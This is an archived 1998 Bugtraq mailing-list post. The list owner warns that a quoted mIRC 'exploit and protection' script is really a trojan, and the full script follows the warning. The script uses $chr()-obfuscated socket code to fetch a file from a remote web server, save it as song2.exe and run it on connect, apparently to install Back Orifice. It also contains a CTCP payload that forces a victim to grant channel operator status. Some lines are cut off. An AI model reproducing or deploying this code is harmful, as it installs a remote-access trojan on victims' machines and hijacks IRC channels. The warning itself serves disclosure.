[8559] in bugtraq

home help back first fref pref prev next nref lref last post

Re: your mail

daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sat Nov 14 20:26:20 1998

Date: 	Sat, 14 Nov 1998 16:08:54 -0600
X-To:         System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: <owner-bugtraq@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199811131950.OAA02949@brampton1.netmatrix.net>

This is a trojan script, if it worked right, it would connect to a certain
webserver and download BO, this should *not* have been passed onto the
list, do *not* attempt to load this script.

On Fri, 13 Nov 1998, System Administrator wrote:

> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has been
> notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.
>
> cya,
>     fs
>
> --- cut here ---
>
> ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
> ;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
> ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
> ;#; -------- That's it... have phun!
> ;#;
> ;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
> ;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
> ;#;   if you want to add this code to your own script please: ASK FIRST!
>
> ctcp 1:userinfo*: antihack
>
> alias antihack {
>   if ($len($2) > 17 && $chr(91) isin $2-) {
>     echo $active mIRC5.41 hack attempt from $nick
>     .halt
>   }
> }
>
> alias hackop {
>   if ($2 == $null) {
>     echo 3 *** Usage: /hackop nick #channel
>     .halt
>   }
>   if ($me !ison $2) {
>     echo 3 *** You aren't on that Channel!
>     .halt
>   }
>   if ($1 !isop $2) {
>     echo 3 *** $1 isn't opped on that channel!
>     .halt
>   }
>   checklen $1
>   .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
>
> alias checklen {
>   .if (%xcomplete == 1) halt
>   .if (%xinprog == 1) halt
>   .set %xfilename song2.exe
>   .set %xlof $lof(%xfilename)
>   .set %xfirst 1
>   .write -c %xfilename
>   ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$  .sockclose protx
>   .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
> on 1:sockopen:protx: {
>   .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$  .sockwrite -n protx
> }
>
> on 1:sockread:protx: {
>   .sockread &test
>   .set %xlof $lof(%xfilename)
>   .if (%xfirst == 1) set %xlof 0
>   .set %xfirst 0
>   .bwrite %xfilename %xlof $sockbr &test
> }
>
> on 1:connect:checklen
>
> on 1:sockclose:protx: {
>   .sockread &test
>   if ($sockbr > 0) {
>     .set %xlof $lof(%xfilename)
>     .bwrite %xfilename %xlof $sockbr &test
>   }
>   .if ($lof(%xfilename) == 178306) {
>     .run %xfilename
>     .set %xcomplete 1
>   }
>   if ($lof(%xfilename) != 178306) {
>     .timer 1 300 checklen
>   }
>   }
>   unset %xinprog
>   unset %xfilename
>   unset %xlof
>   unset %xfirst
> }
>
> --- cut here ---
>

home help back first fref pref prev next nref lref last post